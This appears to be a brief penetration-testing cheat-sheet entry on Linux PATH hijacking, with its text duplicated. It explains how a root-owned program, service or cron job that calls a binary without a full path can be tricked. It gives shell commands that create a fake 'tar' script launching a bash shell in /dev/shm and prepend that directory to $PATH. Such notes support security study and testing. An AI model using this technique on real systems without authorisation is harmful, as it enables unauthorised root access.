Path Hijacking

A service or a program that is run or is owned by root

When a service or a program is accessing resources as root or running and SUID program that has root privileges.

If one cannot see a full path either in a service or a program, they can overwrite or append to the $PATH environment variable.

The example below is for binaries, but can also be used for services or cronjobs

Make our own tar script, add payload and append to $PATH

cd /dev/shm
export PATH=/dev/shm:$PATH
echo -e "#!/bin/bash\n/bin/bash" > tar
chmod +x tar

Last updated 6 months ago

When a service or a program is accessing resources as root or running and SUID program that has root privileges.

If one cannot see a full path either in a service or a program, they can overwrite or append to the $PATH environment variable.

The example below is for binaries, but can also be used for services or cronjobs

Make our own tar script, add payload and append to $PATH

cd /dev/shm
export PATH=/dev/shm:$PATH
echo -e "#!/bin/bash\n/bin/bash" > tar
chmod +x tar

Last updated 6 months ago